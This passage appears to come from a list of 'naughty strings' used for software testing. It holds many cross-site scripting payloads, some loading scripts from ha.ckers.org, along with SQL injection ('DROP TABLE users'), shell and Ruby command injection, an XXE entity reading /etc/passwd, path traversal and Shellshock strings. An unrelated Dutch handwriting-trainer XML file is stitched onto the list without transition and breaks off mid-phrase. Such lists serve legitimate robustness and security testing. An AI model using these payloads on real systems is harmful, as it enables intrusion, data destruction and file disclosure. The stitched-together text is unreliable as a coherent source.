href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=javascript:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// <plaintext> http://a/%%30%30
# SQL Injection # # Strings which can cause a SQL injection if inputs are not sanitized
1;DROP TABLE users 1'; DROP TABLE users-- 1 ' OR 1=1 -- 1 ' OR '1'='1
% _
# Server Code Injection # # Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
- -- --version --help $USER /dev/null; touch /tmp/blns.fail ; echo `touch /tmp/blns.fail` $(touch /tmp/blns.fail) @{[system "touch /tmp/blns.fail"]}
# Command Injection (Ruby) # # Strings which can call system commands within Ruby/Rails applications
eval("puts 'hello world'") System("ls -al /") `ls -al /` Kernel.exec("ls -al /") Kernel.exit(1) %x('ls -al /')
# XXE Injection (XML) # # String which can reveal system files when parsed by a badly configured XML parser
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
# Unwanted Interpolation # # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
$HOME $ENV{'HOME'} %d %s {0} %*.*s
# File Inclusion # # Strings which can cause user to pull in files that should not be a part of a web server
../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../etc/hosts
# Known CVEs and Vulnerabilities # # Strings that test for known vulnerabilities
() { 0; }; touch /tmp/blns.shellshock1.fail; () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
# MSDOS/Windows Special Filenames # # Strings which are reserved characters in MSDOS/Windows
CON PRN AUX CLOCK$ NUL A: ZZ: COM1 LPT1 LPT2 LPT3 COM2 COM3 COM4
# Scunthorpe Problem # # Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
Scunthorpe General Hospital Penistone Community Church Lightwater Country Park Jimmy Clitheroe Horniman Museum shitake mushrooms RomansInSussex.co.uk http://www.cum.qc.ca/ Craig Cockburn, Software Specialist Linda Callahan Dr. Herman I. Libshitz magna cum laude Super Bowl XXX medieval erection of parapets evaluate mocha expression Arsenal canal classic Tyson Gay basement
# Human injection # # Strings which may cause human to reinterpret worldview
If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
# Terminal escape codes # # Strings which punish the fools who use cat/type on this file
Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue But now...[20Cfor my greatest trick...[8m The quick brown fo x... [Beeeep]
# iOS Vulnerability # # Strings which crashed iMessage in iOS versions 8.3 and earlier
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣبك
<?xml version="1.0" encoding="UTF-8"?><alphabetFile xsi:schemaLocation="urn:schemas-microsoft-com:tabletpc:alphabet.v1 Alphabet.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:tabletpc:alphabet.v1"><trainer family="latin" comment="Dutch - All" id="19"><symbol id="A" confusables="atÂ*"/><symbol id="Á" confusables="ÄÂÀA"/><symbol id="À" confusables="ÂÄàÁ"/><symbol id="Â" confusables="ÀâÁÄ"/><symbol id="Ä" confusables="ÀÁÂä"/><symbol id="B" confusables="bD31"/><symbol id="C" confusables="c([e"/><symbol id="Ç" confusables="çG§E"/><symbol id="D" confusables="dBPb"/><symbol id="E" confusables="eFÉt"/><symbol id="É" confusables="ÊËEÈ"/><symbol id="È" confusables="ÉÊËE"/><symbol id="Ê" confusables="ÈÉEê"/><symbol id="Ë" confusables="ÈÉëÊ"/><symbol id="F" confusables="fIE±"/><symbol id="G" confusables="gÇ6E"/><symbol id="H" confusables="htN#"/><symbol id="I" confusables="l1/i"/><symbol id="Í" confusables="íiÏI"/><symbol id="Î" confusables="îiÍT"/><symbol id="Ï" confusables="ïiÍI"/><symbol id="J" confusables="Ij]3"/><symbol id="K" confusables="kRHr"/><symbol id="L" confusables="l<2h"/><symbol id="M" confusables="mNnH"/><symbol id="N" confusables="nMwW"/><symbol id="O" confusables="0o°Ó"/><symbol id="Ó" confusables="óÖöo"/><symbol id="Ö" confusables="ö°Óó"/><symbol id="P" confusables="pDBT"/><symbol id="Q" confusables="qOo°"/><symbol id="R" confusables="rKkN"/><symbol id="S" confusables="s5g$"/><symbol id="T" confusables="t+±F"/><symbol id="U" confusables="u4vK"/><symbol id="Ú" confusables="úÜÛü"/><symbol id="Û" confusables="ûúÚü"/><symbol id="Ü" confusables="üÛäÚ"/><symbol id="V" confusables="vruU"/><symbol id="W" confusables="wnuN"/><symbol id="X" confusables="x*t+"/><symbol id="Y" confusables="y¥4x"/><symbol id="Z" confusables="z2ra"/><symbol id="a" confusables="Aádq"/><symbol id="á" confusables="àäâÁ"/><symbol id="à" confusables="âäÀ°"/><symbol id="â" confusables="àÂä°"/><symbol id="ä" confusables="Äà°ö"/><symbol id="b" confusables="lBf5"/><symbol id="c" confusables="C(e<"/><symbol id="ç" confusables="ǧGE"/><symbol id="d" confusables="aA8&"/><symbol id="e" confusables="éclè"/><symbol id="é" confusables="èëeê"/><symbol id="è" confusables="éêëe"/><symbol id="ê" confusables="èéeë"/><symbol id="ë" confusables="èéïê"/><symbol id="f" confusables="tFG£"/><symbol id="g" confusables="9Gqy"/><symbol id="h" confusables="knbL"/><symbol id="i" confusables="íIïj"/><symbol id="í" confusables="ÍiïI"/><symbol id="î" confusables="ÎiïT"/><symbol id="ï" confusables="Ïi"í"/><symbol id="j" confusables="Ji;I"/><symbol id="k" confusables="Kh4t"/><symbol id="l" confusables="I1L("/><symbol id="m" confusables="MnNw"/><symbol id="n" confusables="Nmhu"/><symbol id="o" confusables="0O°ó"/><symbol id="ó" confusables="ÓöoÖ"/><symbol id="ö" confusables="Ö°óä"/><symbol id="p" confusables="P1rB"/><symbol id="q" confusables="g9QG"/><symbol id="r" confusables="vznV"/><symbol id="s" confusables="S5g9"/><symbol id="t" confusables="E+£T"/><symbol id="u" confusables="U4na"/><symbol id="ú" confusables="Úüûá"/><symbol id="û" confusables="Ûúüâ"/><symbol id="ü" confusables="Üäûú"/><symbol id="v" confusables="VurU"/><symbol id="w" confusables="Wunv"/><symbol id="x" confusables="X*t+"/><symbol id="y" confusables="Y4xJ"/><symbol id="z" confusables="Z2ra"/><symbol id="0" confusables="oO°d"/><symbol id="1" confusables="Il'/"/><symbol id="2" confusables="zZr1"/><symbol id="3" confusables="J}sI"/><symbol id="4" confusables="uyUY"/><symbol id="5" confusables="sSJg"/><symbol id="6" confusables="Gbtf"/><symbol id="7" confusables="Jf1Z"/><symbol id="8" confusables="P°o±"/><symbol id="9" confusables="gqGy"/><symbol id="_" confusables="-.=~"/><symbol id="-" confusables=".~rn"/><symbol id="(" confusables="lCcL"/><symbol id="[" confusables="C(Ec"/><symbol id="{" confusables="E[lL"/><symbol id="„" confusables=""1±,"/><symbol id=")" confusables="J]I,"/><symbol id="]" confusables="JI3,"/><symbol id="}" confusables="3J,I"/><symbol id="'" confusables=",1.I"/><symbol id="!" confusables="l?tf"/><symbol id=""" confusables="„1±,"/><symbol id="#" confusables="*¥Ht"/><symbol id="%" confusables="o09q"/><symbol id="&" confusables="*R8r"/><symbol id="*" confusables="#A¥t"/><symbol id="," confusables="'.1J"/><symbol id="." confusables="-';á"/><symbol id="/" confusables="1lI'"/><symbol id=":" confusables=";.'!"/><symbol id=";" confusables=":ij±"/><symbol id="?" confusables="!721"/><symbol id="@" confusables="aQde"/><symbol id="\" confusables="l1I'"/><symbol id="~" confusables="nr-v"/><symbol id="+" confusables="tT±*"/><symbol id="<" confusables="cClL"/><symbol id="=" confusables="±<ex"/><symbol id=">" confusables="7,s)"/><symbol id="±" confusables="I¥€F"/><symbol id="$" confusables="§BsD"/><symbol id="£" confusables="Ef€t"/><symbol id="¥" confusables="EI±#"/><symbol id="€" confusables="E£et"/><symbol id="§" confusables="$çs5"/><symbol id="°" confusables="o0O."/><phraseCue>Schrijf de zin hierboven eenmaal over.</phraseCue><phraseSet id="PhraseSet1"><phrase>76% Van de studenten is geslaagd; 14% is gezakt.</phrase><phrase>"Kóm hier! Nú!" riep Yvonne naar haar zoon Zeno.</phrase><phrase>Mijn telefoonnummer is: 020 - 526 55 87.</phrase><phrase>Ik ben geboren te 's-Gravenhage op 25/04/1973.</phrase><phrase>Wachtwoorden met een *,{,},\,[ of ] zijn ongeldig.</phrase><phrase>Welkom bij ING: Je wachtwoord is *Eylül~Göx*.</phrase><phrase>Haar website is http://www.ELIZABETH~BISCHOF.com.</phrase><phrase>Ivo wist niet dat Zoë en Ines zussen zijn.</phrase><phrase>Mijn e-mailadres is Maartje@Möllen_Krüllern.nl.</phrase><phrase>Île-de-France betekent Eiland van Frankrijk?</phrase><phrase>Mijn adres is Ieperlaan 84, 5233 RH 's-Hertogenbosch.</phrase><phrase>Rijen Q->U en W->X voor het Lütfü concert zijn vol.</phrase><phrase>De meester noteerde: 5+8 < 9+8 > 6+1.</phrase><phrase>Café en enquête zijn vernederlandste Franse woorden.</phrase><phrase>De bankier noteerde: € 1 = $ 1,5877 = ¥ 168,97.</phrase><phrase>Het symbool voor de Japanse yen is '¥'.</phrase><phrase>In 2001 boekte hij een 6% winst van £ 800.000.</phrase><phrase>De Britse £ versterkt, maar de Amerikaanse $ verzwakt.</phrase><phrase>Vóór ons coördinatiegesprek was Max nog in orde.</phrase><phrase>De geïmproviseerde trip naar Ethiopië was vreselijk.</phrase><phrase>"SCHUIF AAN IN DEZE RIJ A.U.B.," schreef Hélène.</phrase><phrase>Tom las de 6 laatste letters van het alfabet: 'UVWXYZ'.</phrase><phrase>"Waarom is Adèle niet geïnteresseerd?" schreef Pol.</phrase><phrase>Ik heb maar een páár koekjes; ik wil een héle zak!</phrase><phrase>De letters à, â, ç en ê komen veel voor in het Frans.</phrase><phrase>"Onze financiële situatie is een rámp!" riep Lea.</phrase><phrase>De kaart kost £ 4. Kan je me £ 1 lenen? </phrase><phrase>De geïmporteerde crème uit Bäretswil kost € 4.</phrase><phrase>"Zít!" riepen Xander en Adelaïde samen.</phrase><phrase>Gaan Benoît en François deze zomer naar Alstätten?</phrase><phrase>De code voor de voordeur is: [#TUK&VO_PUQ&CY].</phrase><phrase>Het symbool '@' noemt men een apenstaartje.</phrase><phrase>Stuur het naar haar e-mailadres: Píx_Tà[email protected].</phrase><phrase>5° Celsius is ± 41° Fahrenheit.</phrase><phrase>€ 5 is tegenwoordig ± $ 8 of ± ¥ 845 waard.</phrase><phrase>De 'tilde' of '~' wordt vaak gebruikt in computertaal.</phrase><phrase>Is dit correct: (5+3) < (8-2) en (6-1) < (8+9) ?</phrase><phrase>De 'backslash' is de benaming voor het leesteken '\'.</phrase><phrase>Het document is opgeslagen onder C:\Mijn documenten\Jo.</phrase><phrase>Volgende tekens noemt men 'haakjes': ( ), [ ], { }.</phrase><phrase>'Château' is het Franse woord voor 'kasteel'.</phrase><phrase>"Búk je!" riep Dominique.</phrase><phrase>Jacob is alleen; zijn vrouw heeft hem verlaten.</phrase><phrase>Een verzoek aan Vera & Bulkjens is in behandeling.</phrase><phrase>De leerkracht fysica noteerde: 5°C = ...°F?</phrase><phrase>De accolades { en } noemt men ook gekrulde haakjes. </phrase><phrase>Mijn mama's telefoonnummer is: 0569 349 998.</phrase><phrase>'ALLES = € 1' staat in het groot op zijn winkel.</phrase><phrase>Dag Annie, alles goed met je?</phrase><phrase>Bas is een echte grapjas.</phrase></phraseSet><phraseSet id="PhraseSet2"><phrase>Sla het bestand a.u.b. op onder C:\QUOT_INFO_3~8\fin.</phrase><phrase>"Zít! Nú!" riep Noël naar zijn hond Rémy.</phrase><phrase>39,5 °C komt overeen met ± 103°F.</phrase><phrase>Hij bezit ± € 70.583; dat is ± ¥ 7.532.952.</phrase><phrase>Dit was de examenvraag: (5x9) + (7-3) + (40/4) = ...? </phrase><phrase>'GELIEVE TE WACHTEN' stond er op het bord. </phrase><phrase>Quinten is eenzaam; Simone heeft hem verlaten.</phrase><phrase>Iedereen is welkom; ik hoop echter dat Jan wegblijft.</phrase><phrase>Blokhaakjes zien er als volgt uit: [ en ].</phrase><phrase>Zijn Gökce en Ergüvenç afkomstig uit Turkije?</phrase><phrase>Toets a.u.b. volgende code in: [*ä&î~~êâ4*].</phrase><phrase>François wordt dit jaar tweeënveertig.</phrase><phrase>Op het eind van mijn carrière verdiende ik $ 175.664. </phrase><phrase>"Móói! Zeg nu eens, gelooft Thérèse echt in elfen?" </phrase><phrase>Aïda weegt maar 54,2 kg.; ideaal voor een mannequin.</phrase><phrase>Er zijn veel 16- en 17-jarige cocaïneverslaafden.</phrase><phrase>Dit is volgens Jean-Pièrre geïmiteerde Leidse klei.</phrase><phrase>Faeröer spreek je als volgt uit: [fêêr-eu-er].</phrase><phrase>Bäretswil is een dorpje in het Zwitserse kanton Zürich.</phrase><phrase>"Nou, dá's straf! $ 40 is níks!" riep José uit.</phrase><phrase>Hij legde uit: "Als 8+9 > 5-1 dan is 5-1 < 8+9."</phrase><phrase>Hélène heeft € 1.337,50 geïnvesteerd; dat is $ 2.116,37.</phrase><phrase>"Noemt men ( ), [ ], { } en < > haakjes?" vroeg ze.</phrase><phrase>Aimé en Eugène hebben één e-mailadres: [email protected].</phrase><phrase>"Húp, húp, dánsen!" zong Benoît uit volle borst.</phrase><phrase>De website van Yvo's zaak is http://Château_St_Miq.com.</phrase><phrase>'GEEN VUURWAPENS A.U.B' staat er op de deur.</phrase><phrase>Xander en Yvonne Lootens wonen in 's-Gravenhage.</phrase><phrase>H&M boekte in 2007 15% winst (ongeveer € 69.000).</phrase><phrase>Karoline Van Wanten is qua uiterlijk perfect.</phrase><phrase>"Dat is ídeaal!" riepen Max en Yolanda.</phrase><phrase>De Engelsman gaf me slechts £ 1 i.p.v. £ 2 terug.</phrase><phrase>£ 1 is momenteel ¥ 211,463 waard.</phrase><phrase>Neem minstens ¥ 7.532 mee voor je trip naar Japan.</phrase><phrase>Het was snikheet in Qatar, ongeveer 40°C.</phrase><phrase>Robs adres is: 4500 Aqualaan 2X, 3583 Paal.</phrase><phrase>Een e-mailadres bevat steeds volgend teken:'@'.</phrase><phrase>Zoek het document onder D:\K&U{123}K&X{123}\yvo.</phrase><phrase>"C'est à moi, pas à toi," schreef ze in het Frans.</phrase><phrase>"Een aquaduct is een brug," schreef de leerling.</phrase><phrase>"5+5=10," legde hij zijn dochter uit.</phrase><phrase>De V&D kende een verlies van 5,6%.</phrase><phrase>De nummers 3 t/m 27 mogen binnenkomen.</phrase><phrase>Is dit correct: 5% van 100 > 2% van 200? </phrase><phrase>Stuur een e-mail naar "[email protected]" zei hij.</phrase><phrase>Deze groep gaat naar Rome.</phrase><phrase>Zijn dochter is getrouwd met Rob Boschuyt.</phrase><phrase>Wie komt jou afhalen vanavond?</phrase><phrase>"Als 7+3=10, dan is 10-7=3" zei de j
1 note
·
View note